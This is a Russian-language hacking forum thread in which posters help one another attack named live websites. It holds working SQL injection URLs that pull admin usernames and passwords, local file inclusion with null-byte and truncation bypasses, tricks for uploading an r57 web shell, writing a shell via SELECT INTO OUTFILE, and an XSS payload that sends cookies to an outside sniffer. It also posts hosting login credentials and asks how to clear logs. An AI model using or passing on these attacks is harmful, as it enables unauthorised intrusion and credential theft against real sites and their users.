потому что локальный инклуд, LFI:

./inc/ в начале стоит, видишь? http уже не проканает

А это что занчит? Ничего не зделаешь?
С нулевым тоже не канает!

geforce
Мне кажется тебе дали линк на статью. Что, теперь нужно её сюда специально для тебя переписать?
Вот ещё одна, читай, потом пиши
https://forum.antichat.ru/thread23501.html

Там все ответы

здравствуйте

Перейду к делу.На сайт достал админку , теперь хочу залить шелл. ( r57shell Версия: 1.24 )

но проблема в том файлы которые можна добавить должны быть обязательно такого формата (gif, jpg, png, htm, html, pdf, zip, swf, mp3, flv, doc, docx, xls, xlsx, rtf )

ни разу этого еще не делал . сильно не пинайте ))
По полкам не надо раскладывать , проста и доступна , остальное сам до думою


Спасибо за время.

geforce
Мне кажется тебе дали линк на статью. Что, теперь нужно её сюда специально для тебя переписать?
Вот ещё одна, читай, потом пиши
https://forum.antichat.ru/thread23501.html

Там все ответы

Все испробовал!!! Что дальше делать ничего не вышло???

здравствуйте

Перейду к делу.На сайт достал админку , теперь хочу залить шелл. ( r57shell Версия: 1.24 )

но проблема в том файлы которые можна добавить должны быть обязательно такого формата (gif, jpg, png, htm, html, pdf, zip, swf, mp3, flv, doc, docx, xls, xlsx, rtf )

ни разу этого еще не делал . сильно не пинайте ))
По полкам не надо раскладывать , проста и доступна , остальное сам до думою


Спасибо за время.

Попробуй дать своему шеллу расширение *.html.php
Иногда проходит, так как в некоторых скриптах смотрится на расширение идущее после первой точки:

...
$exps=array('rar','zip','doc','html');
$rash=explode(".",$_FILES["userfile"]['name']);
if(!in_array(strtolower($rash[1]), $exps))
die('fuck!');
...

Все испробовал!!! Что дальше делать ничего не вышло???

А что ты хочишь получить от даной уязвимости?

люди при скачивани шели мои антивирус начинает ругать что это потенциально апасное по это так и должно быть

люди при скачивани шели мои антивирус начинает ругать что это потенциально апасное по это так и должно быть
Да это нормально, добавь файл в исключения, чтобы антивирус не сканировал его.

а что означает фреим

http://ru.wikipedia.org/wiki/Фрейм

аааа это я по думал чтото другое типа лексики хакера ну извените

Всем привет. Поджскажите мне плиз, реально ли как-то получить аккаунт с помошью такой вот уязвимости?

http://footage.shutterstock.com/videos.html?clipbox_id=255910%22%3E%3Cscript%3Eale rt(/d/)%3C/script%3E

там просто четкие фотки и видео ХД хочу писец ))

Версия форума vBulletin 3.5.8
В какой таблице пассы админа?
Как залить шелл через админку?

Помогите со sql запросом:
Имя базы: dbforum1
Имя таблицы: ibf_members
Имена нужных строк: name, mgroup, password
Покажите на примере как запросить эти данные у пользователя с id=399999
Или у пользователя с name=LOL
UNION SELECT...
PS: Можно внедрять только один параметр.

select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members

select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members

а where id, where name ненадо? :)
Я в sql неразбираюсь просто

where+name='LOL'

select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members

А-а-а Спасибо, получилось имя вывести, Огромный тебе РЕСПЕКТ.

Подскажи пожайлуйста как посмотреть вторую, третью, 545788 строчку :D

А-а-а Спасибо, получилось имя вывести, Огромный тебе РЕСПЕКТ.

Подскажи пожайлуйста как посмотреть вторую, третью, 545788 строчку :D

select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members limit 1,1

select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members limit 545788,1

where+name='LOL'
Там так не получится :(
http://img407.imageshack.us/img407/6849/91767217.png

Там так не получится :(
http://img407.imageshack.us/img407/6849/91767217.png

Переводи в hex.

where+name=0x4c4f4c

select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members limit 1,1

select concat_ws(0x3a,name,password,mgroup) from dbforum.ibf_members limit 545788,1

Спасибо, получилось :)

Перводи в hex.

where+name=0x4c4f4c

И Это тоже :)

PS: Как sql лог почистить? :)

http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=1+AND+1=1/*

http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=1+AND+1=2/*

Скуля ведь? Как раскрутить? Не получается даже узнать версию с помощью подзапросов.

про инклудов прочитал но во многих саитах его зашишают а можно ди с помащю инклуда и налажением шели от другого саита создать папку

http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=1+AND+1=1/*

http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=1+AND+1=2/*

Скуля ведь? Как раскрутить? Не получается даже узнать версию с помощью подзапросов.

http://en.isranews.com/index.php?option=com_content&view=category&layout=blog&id=3-2

про инклудов прочитал но во многих саитах его зашишают а можно ди с помащю инклуда и налажением шели от другого саита создать папку
Мы тут посовещались с коллегами на ИРЦ
(они все как один хакеры) и поняли, что нам ровным счётом ничего не известно про способ "налажением шели от другого саита ".

Не мог-бы ты яснее сформулировать вопрос?

Мы тут посовещались с коллегами на ИРЦ
(они все как один хакеры) и поняли, что нам ровным счётом ничего не известно про способ "налажением шели от другого саита ".

Не мог-бы ты яснее сформулировать вопрос?

Он наверное имеет в виду удалённый инклуд.

Теперь это так называется?
Спасибо, теперь будем знать!.

тоесть инклудовать свой шелл, на другую страницу

AET, напиши по РУССКИ, что ты хочешь???
Залить шелл на свой хост, затем с помощью удалённого инклуда его подключить на бажный сайт и создать папку??

тоесть инклудовать свой шелл, на другую страницу
А, "инклудовать"?! Это совсем другое дело.

Думаю если у Вас существует возможность "инклудовать свой шелл" , а так-же "на запись в папку правать", то создать папку, либо файл, вполне возможно. Прям из "инклудоваемого" шелла.

Единственное, что опять повергает меня в сомнения это фраза "на другую страницу". Дело в том, что этот момент я так и не смог понять, поэтому ответ возможно не полон.

PS Простите за грамматику, не вполне ещё освоился с Вашим диалектом

-m0rgan- да я так и хотел сделать

jokester вы меня поняли блогодарен

R1dex
Я не совсем понял, можно ли поподробнее?

А что ты хочишь получить от даной уязвимости?

хочу получить доступ к базе!!! Возможно?

Как я понял прочитав много инфы о инклуде это локальный инклуд! И с помощью его можно только просматривать файлы с нуливым байтом %00!

Но к сожелению у меня и это не проканало! :confused:

И еже вопрос:
Можно ли error include использовать для XSS атаки?

нулл байт скорее всего не проходит по той причине, что magic_quotes_gpc ON, ибо происходит слеширование:

Warning: include(./inc/../../../etc/passwd\0.php)

нулл байт скорее всего не проходит по той причине, что magic_quotes_gpc ON, ибо происходит слеширование:

Warning: include(./inc/../../../etc/passwd\0.php)


Это означает что это безполезная инклуда???

2geforce
попробуй аналог нуллбайту
raz0r.name/articles/null-byte-alternative/

Есть ссылка на инет провайдера!
https://stat.tvingo.ru/

при вписывании в окно Регистрационное имя
xss код '<script>alert(123)</script>

Этим можно как нибудь воспользоваться???

http://forum.antichat.ru/thread20140.html

2geforce
Ты можешь составить запрос:
'><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
(c)Micr0b
Для перенаправления куков на сниффер.

Это означает что это безполезная инклуда???

http://wow.alania.net/?page=../../etc/passwd%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C

Расширение срезалось:

Warning: include(./inc/../../etc/passwd<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<&l in Y:\home\78.110.144.12\www\index.php on line 104

http://wow.alania.net/?page=../../etc/passwd%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C %3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3 C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C% 3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C%3C

Расширение срезалось:

Warning: include(./inc/../../etc/passwd<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<&l in Y:\home\78.110.144.12\www\index.php on line 104


Ну вижу срезалось!

И что мне теперь с этим делать???

На счёт доступа к БД через локальный инклуд, я хз, ниразу не слышал...
А вот почитать файлы на сервере можно, остаётся узнать, на сколько дирикторий ниже находится нужный нам файл. Вместо символа "<"(0x3C) используй "."(0x2E) для того, чтобы иметь возможность выйти из текущей директории.

А вот почитать файлы на сервере можно, остаётся узнать, на сколько дирикторий ниже находится нужный нам файл. Вместо символа "<"(0x3C) используй "."(0x2E) для того, чтобы иметь возможность выйти из текущей директории.
во первых
сервер виндовый о чем явственно гласит надпись "in Y:\home\78.110.144.12\www\index.php"
значит никакого /etc/passwd

во-вторых
замена нулл-байта для винды - 255 точек(если пямять не изменяет)

upd: 266 ,пардон ,точек. более универсальная весч.

Помогите обойти фильтр! Не выводится алерт!

[im*g]http://www.qwewqw.ru/1.jpg%20dynsrc=javascript:alert()[/im*g]

Помогите обойти фильтр! Не выводится алерт!

[im*g]http://www.qwewqw.ru/1.jpg%20dynsrc=javascript:alert()[/im*g]
а как он обрабатывает этот ББ-код в ХТМЛ? кинь исходник странички в этом месте

<img src="http://www.qwewqw.ru/1.jpg%20dynsrc=javascript:alert()" alt="Изображение" />

Попробуй
[im*g]http://www.qwewqw.ru/1.jpg" dynsrc="javascript:alert()[/im*g]

<img src="http://www.qwewqw.ru/1.jpg&quot;%20dynsrc=&quot;javascript:alert()" alt="Изображение" />

тогда у тебя не получится, там фильтруется двойная ковычка, а без неё тебе там ничего не сделать.

во первых
сервер виндовый о чем явственно гласит надпись "in Y:\home\78.110.144.12\www\index.php"
значит никакого /etc/passwd

во-вторых
замена нулл-байта для винды - 255 точек(если пямять не изменяет)

upd: 266 ,пардон ,точек. более универсальная весч.

НУ ПОМОГИ ТОГДА!

По подробнее можешь расписать???

НУ ПОМОГИ ТОГДА!

По подробнее можешь расписать???

зачем тебе это а там ведь инклуда. инклуду уже во многих саитах зашешают только не опотныие програмисты могут сделать такое. помоему ты хочеш узнать что можно сделать с таким ошибкой я тоже хотел бы узнать что можно сделать если наити на саитах такие инклуд ошибки и к чему они приведут если оно попоидет в руку хакера

Ну вижу срезалось!

И что мне теперь с этим делать???


http://wow.alania.net/index.php?page=../index
http://wow.alania.net/?page=../config

http://www.ncrtp-hepc.ca/profiles.php?id=70
SQL-Inj. Help...

geforce, не пиши красным =\http://www.google.com/search?client=opera&rls=en&q=site:forum.antichat.ru+wow.alania.net

2mailbrush
Там одно поле:

http://www.ncrtp-hepc.ca/profiles.php?id=70+order+by+1--+

И четвёртая ветка:

http://www.ncrtp-hepc.ca/profiles.php?id=70+and+substring(version(),1,1)=4--


Но вывода скорее всего нету, но это не ознаает, что его и не будет, гдето здесь присалось об этом:

Если версия >=4 . или мы видим ошибку different number of columns это вовсе не означает, что вывода не будет.
Вероятность найти вывод всё равно остаётся. По этой теме идём читать сюда:
different number of columns (https://forum.antichat.ru/thread104591.html)
с поста 79 и вниз со всеми комментариями

Если ничего не выйдет, то работай подзапросами!

SQL-Inj. Help...


http://www.ncrtp-hepc.ca/profiles.php?id=70+and+ascii(substring((select+con cat_ws(0x2F,email,pwd)+from+admin+limit+0,1),1,1))>1

http://www.ncrtp-hepc.ca/profiles.php?id=70
SQL-Inj. Help...

Там только одно поле и нету вывода. Заюзай эту лучше:
http://www.ncrtp-hepc.ca/profiles.php?type=-3+union+select+1,concat_ws(0x3a,user(),version(),d atabase()),3,4,5,6,7/*

ps: Тут еще прикольный листинг директорий есть, может пригодится: http://www.ncrtp-hepc.ca/photos.php?album=../

у меня такой вопрос
как если есть листинг дирректории просмотреть код php файла

2 crazy~driver
Не посмотришь, т.к. php интерпретируется на стороне сервера, независимо от включенного\выключенного листинга директорий

ясненько жаль конечно bak как назло нет
спс iceangel

http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=217+union+select+null,null,null, null,null,null,null,null,null,null,null,null,null, null,nullPostgreSQL - первый раз с такой стыкаюсь. Почитал статтейку, вроде понял, но не пашет (не выводится).

http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,version(),null,null,nul l,null,null,null,null,null,null,null,null,null--

http://www.unipi.it/php/corsilaureaing/dett_corso.php?id=-218+union+select+null,null,TABLENAME,null,null,nul l,null,null,null,null,null,null,null,null,null+fro m+PG_TABLES--

всё как обычно, в чём трудности?

Блин, о минусе забыл... В статье его не было - думал нельзя так

Вопросик, вот пример

http : // infovisa . ru /index.php?id=44'

Fatal error: Uncaught exception 'CMySQLException' with message 'Ошибка в запросе "SELECT * FROM `cp_content_page` WHERE `id`='44''"!' in /home/infovisa/public_html/includes/classes/mysql.class.php:150 Stack trace: #0 /home/infovisa/public_html/includes/classes/mysql.class.php(235): CMySQL->ThrowError('?????? ? ??????...') #1 /home/infovisa/public_html/includes/classes/content.class.php(64): CMySQL->Query('SELECT * FROM `...') #2 /home/infovisa/public_html/index.php(58): CContent->__construct('44'') #3 {main} thrown in /home/infovisa/public_html/includes/classes/mysql.class.php on line 150
реально посмотреть в запрос можно что угодно вроде как вставить, но ниче не получается.

http://infovisa.ru/index.php?id=44'+order+by+7+--+
7 полей..

http://infovisa.ru/index.php?id=-44'+union+sElect+1,2,3,4,5,6,concat_ws(0x3a,user() ,database(),version())+--+
infovisa_site@localhost:infovisa_site:5.0.67-community

сенкс

Подскажите, если присутствует такая sql-inj:
index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,usertype,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0/**/from/**/jos_users/*
С помощью нее можно залить шелл? если да, то как?

Подскажите, если присутствует такая sql-inj:
index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,email,usertype,0,0,0,0,0,0,0,0 ,0,0,0,0,0,0,0/**/from/**/jos_users/*
С помощью нее можно залить шелл? если да, то как?
это джумла(joomla)
после того как сбрутишь пасс админа логинишься в админку
адмника тут - site.com/administrator/
а дальше через установку модулей и компонентов, или через языки.
также если установлен компонент joomla_extplorer, можно и через него.

Как можно обойти фильтрацию скобок при sql-inj?

подскажите
может кто-то сталкивался с хостингом mirohost
как мне пробраться к авторизации в phpmyadmin

только не тестовому

помогите разобраться, что делаю не так, почему не выводятся значения?
версия 5
таблица и колонки существуют

ht*p://zoorinok.com.ua/veterinar.php?id=-1+union+select+1,2,concat_ws(0x3a,users_login,user s_pas),4,5+from+sip_zoorinok.USERS+limit+1,1/*

http://zoorinok.com.ua/veterinar.php?id=-1+union+select+1,2,concat_ws(0x3a,cast(users_login +as+binary),cast(users_pas+as+binary)),4,5+from+si p_zoorinok.USERS+limit+1,1/*

Всех с 9 Мая

Tакой вопрос , мознали как то на сайт закинут shell ( есть админка ) , тока вот format php нельзя .Можно Ли это как то обойти ?

Попробуй двойное расширение типа shell.gif.php
Не опытные программисты часто допускуют такую ошибку, так как проверяют расширение идущее после первой точки.

подскажите
может кто-то сталкивался с хостингом mirohost
как мне пробраться к авторизации в phpmyadmin

Вот что у меня получилось выудить у службы поддержки:

phpmyadmin находится в панели управления, раздел управление mysql - mysql менеджер - список пользователей - phpmyadmin


То есть как мне показалось там нету полного интерфейса пхпмайадмина, но это косвенно...

Пока искал твой пхпмайадмин в гугле наткнулся на интересый поддомет этого хостинга:

http://mirror.mirohost.net/


Что я там обнаружил, от туда можно скачать phpmyadmin oO

http://mirror.mirohost.net/ubuntu/pool/universe/p/phpmyadmin/

А также различные конфиги похопе, но это если интересует...

Как можно обойти фильтрацию скобок при sql-inj?
В зависимости от конкретной ситуации и конкретного примера...

С праздником!

Такой вопрос:
есть phpmyadmin от юзера root@localhost со всеми привелегиями...при запросе типа
select '<? phpinfo(); ?>' into outfile '/patch_to_public_html/shell.php'
выдает "#1 - Can't create/write to file '.../shell.php' (Errcode: 13)"
В корень, в папки usr,var - та же ошибка... почему это у рута не хватает прав на создание файла Оо ?

так root то mysql ный а не системный!

bug1z, то, что ты нашел называется репозиторий. И это не уязвимость.

DeepXhadow, root в mysql не является рутом в системе. У тебя права скорее всего просто mysql. Ищи на сайте диры с правами на запись для всех.

bug1z, то, что ты нашел называется репозиторий. И это не уязвимость.

Уязвимосто-не уязвимость а некоторые свединия о системе выдаёт...

Вот что у меня получилось выудить у службы поддержки:




То есть как мне показалось там нету полного интерфейса пхпмайадмина, но это косвенно...

Пока искал твой пхпмайадмин в гугле наткнулся на интересый поддомет этого хостинга:

http://mirror.mirohost.net/


Что я там обнаружил, от туда можно скачать phpmyadmin oO

http://mirror.mirohost.net/ubuntu/pool/universe/p/phpmyadmin/

А также различные конфиги похопе, но это если интересует...

вот акк на тестовый период и там они дают полную версию так что и на платку по идее должна быть полная версия phpmyadmin


Данные для работы с базой данных MySQL :
mySQL server: localhost
mySQL database: test3serv316
mySQL login: u_test3serv316
mySQL password: RqJt6A0p

phpMyAdmin: http://test3servdb.mirohost.net

Посмотри на тестовый период дают phpmyadmin должен же быть и на платник нормальный phpmyadmin
FTP server: ftp://test3serv.mirohost.net
FTP login: test3serv316
FTP password: RqJt6A0p

Плфтный пхпмайадмин скорее всего даётся на определённый ip адрес, по крайней мерее так на большенстве хостингов.
Например так:
https://хх.ххх.хх.ххх:хххх

2 bug1z

то есть , по другому никак ?
Я уже пробовал так (shell.jpg.php )
Возможно есть другой способ ?

PS: У кого есть html shell ?

это джумла(joomla)
после того как сбрутишь пасс админа логинишься в админку
адмника тут - site.com/administrator/
а дальше через установку модулей и компонентов, или через языки.
также если установлен компонент joomla_extplorer, можно и через него.
Пасс админа уже есть, но директория site.com/administrator/ закрыта файлом .htaccess, поэтому и спрашиваю про sql-inj

при воде ковычек выдает ошибку
ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/index.asp, line 21

Пасс админа уже есть, но директория site.com/administrator/ закрыта файлом .htaccess, поэтому и спрашиваю про sql-inj
чтобы залить шелл только через sql-inj, нужно
file_priv = Y
magic_quotes_gpc=OFF
иметь директорию,видимую из вэба, на запись.
тогда шелл заливается запросом select into outfile.

2 bug1z

то есть , по другому никак ?
Я уже пробовал так (shell.jpg.php )
Возможно есть другой способ ?

PS: У кого есть html shell ?

Почему же, есть и другие способы, например запихнуть шелл в картинку, об этом можешь почитать здесь(юзай поиск :D )

Так же посмотри, нету ли в админке ф-и для добавления формата загружаемых файлов...

Если и эти способы не прокатят, зна не судьба залить через админку(ИМХО).

В этом случае ищи баг на сайте с помощю которого есть возможность залить шелл, это например SQL inj или php include, с их помощю можно будет залить шелл(ЕСЛИ ПОВЕЗЁТ!!!)

при воде ковычек выдает ошибку
ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/index.asp, line 21

Это скорее всего MSSQL и тута не чего не попишеш... хотя хз
Ищи ошибку вот такого вида
Microsoft OLE DB Provider for SQL Server error '80040e14'

Line 1: Incorrect syntax near 'NO'.

/prodDetails.asp, line 1282
И смотри >>Здесь<< ( https://forum.antichat.ru/thread30501.html)

Вообщем есть сплойт.
http://milw0rm.com/exploits/4851
Даже если забиваю этого кусок кода на локальхост

$source = htmlspecialchars($text);

$source = preg_replace(
'/&lt;!--(.*?)--&gt;/es',
'"<span style=\"color: ".$options["color"]["comment"].";\">&lt;!--".
str_replace("&lt;","&lt;<!-- -->",
str_replace("=","=<!-- -->",
"$1")).
"--&gt;</span>"',
$source);

и тестю
html.php?text=%3C!--{${eval($s)}}--%3E&s=phpinfo();
И собсна он не выполняет phpinfo...Вопрос почему?...в регурялках я не разбираюсь пока....в чём соль? версия php?

при воде ковычек выдает ошибку
ADODB.Field error '800a0bcd'

Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.

/index.asp, line 21

Ошибка говорит о том, что ты передаёшь, не существующий URL параметр. Дабы небыло такой ошибки часто место неё выводят MsgBox.
Пример:

<% If rsProfile.EOF And rsProfile.BOF Then %>
<script language="VBScript">
dim Message
Message=MsgBox("Такой записи не существует",65,"Ошибка")
document.write(Message)
</script>
<% End If %>

Имхо инъекции здесь нету!

DimOnOID

А на твоем тестовом сервере register_globals включен?
ковырял я не тот php.ini) :rolleyes: Вот в чём соль)

где можно взять полный список этих "параметров(или хз как их назвать)" для проведения xss.
или это полный список?

'/about:/i','/vbscript:/i','/onclick/i','/onload/i','/onunload/i','/onabort/i',
'/onerror/i','/onblur/i','/onchange/i','/onfocus/i','/onreset/i','/onsubmit/i',
'/ondblclick/i','/onkeydown/i','/onkeypress/i','/onkeyup/i','/onmousedown/i',
'/onmouseup/i','/onmouseover/i','/onmouseout/i','/onselect/i','/javascript/i',

как обойти такую штуку, есть склинк, нефильтруется, но находится в кавычках, как обойти? пример

site.com/index?id=1'ляляля

error SELECT * FROM table WHERE '1'ляляля'


<!--
+--+
#
/*

неработает

udman не можешь закоментировать кавычку,честно говоря никогда не встречал такого(,
но действовал бы в стиле такого site.com/index?id=1'+and+'1'='2

как обойти такую штуку, есть склинк, нефильтруется, но находится в кавычках, как обойти? пример

site.com/index?id=1'ляляля

error SELECT * FROM table WHERE '1'ляляля'


<!--
+--+
#
/*

неработает
"-- "
"--+1"

сайт выдает такую ошибку
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "1' UNION SELECT 1 --"]'

/play/play.asp, line 31

Я и товарищь bug1z уже отвечали те на этот вопрос.... по моему даже очень доступно.
Или ты любиш биться головой о стену......

по поводу

site.com/index?id=1'+and+'1'='2

будет выглядеть как

site.com/index?id=1'+and+'1'='2'

имееться в виду что нужно закрыть последнюю кавычку.

где можно взять полный список этих "параметров(или хз как их назвать)" для проведения xss.
или это полный список?
Называется это события(events):
_http://vvz.nw.ru/Lessons/JavaScript/events.htm

по поводу

site.com/index?id=1'+and+'1'='2

будет выглядеть как

site.com/index?id=1'+and+'1'='2'
Не будет. Смотри, н.п. такой запрос есть:
mysql_query("SELECT column FROM table WHERE id='".$_GET['id'])."'"
Т.е. id в кавычках. Если ты напишешь 1'+and+'1'='2', запрос будет SELECT column FROM table WHERE id='1' and '1'='2'' Синтаксис некорректный, т.к. есть лишняя кавычка. Выход - комментарии. Если же без последнего аппострофа, SELECT column FROM table WHERE id='1' and '1'='2'Кавычка будет закрыта.

http://pocketbook.com.ua/index.php?id=204+union+select+0,user(),2,3,4,5,6,7 ,8,9,10,11,12,13,14+--+
вопрос что как здесь правильно поступить если 1 переменная в 2 или 3-х запросах
Ошибка в SQL запросе:
SELECT parent_id, page_id FROM tbl_page WHERE page_id = 204 union select 0,user(),2,3,4,5,6,7,8,9,10,11,12,13,14 --

Ответ MySQL сервера:
The used SELECT statements have a different number of columns

В файле:
/var/www/pocketbook/data/www/pocketbook.com.ua/functions.php

Строка:
160
Время: 2009-05-11 19-18-40

Ошибка в SQL запросе:
SELECT element_type, tbl_page.status, tbl_elements.element_id, tbl_attributes.value from tbl_page left join tbl_template using (template_id) left join tbl_elements using (template_id) left join tbl_attributes using (element_id) where tbl_page.page_id = 204 union select 0,user(),2,3,4,5,6,7,8,9,10,11,12,13,14 -- AND tbl_page.status=2 AND tbl_attributes.name = "field_name"

Ответ MySQL сервера:
The used SELECT statements have a different number of columns

В файле:
/var/www/pocketbook/data/www/pocketbook.com.ua/class/content_simple.class.php

Строка:
207
Время: 2009-05-11 19-18-40

1

mailbrush:
на этом сайте пробывал не получается как ты говришь, вот

http://pocketbook.com.ua/index.php?id=204'+and+'1'='2'

поправь меня если мож не так понял

не сочтите за полного лола но все же еще спрошу

http://www.ovacia.com.ua/news.php?id=-1'+union+select+0,1,2,3+--+

здесь вроде есть инк но ни табл ни user() ниче не работает, то есть 0,1,2,3 выводит и усе

1. Скуля есть, пятая ветка, если нашел ошибку с КАВЫЧКОЙ это вовсе не означает, что БЕЗ кавычки ты уже не сможешь повлиять на скуль запрос:


http://pocketbook.com.ua/index.php?id=204+and+substring(version(),1,1)=5


2. Проверяем, есть ли принтабельные поля, предварительно пытаясь подобрать их кол-во, собственно:

- принтабельных полей вроде нет, вывод - слепая скуля

3. Не устраивает слепая - ищи скули в ссылках на этом же сайте по другим параметрам

по второму сайту:


http://www.ovacia.com.ua/news.php?id=-1'+union+select+0,1,unhex(hex(version())),3+--+


Только брут

мдя, учится и еще раз учится, спасибо, кое что понял

Можите пожалуйсто подсказать , что можно в этой SQL inj сделать?
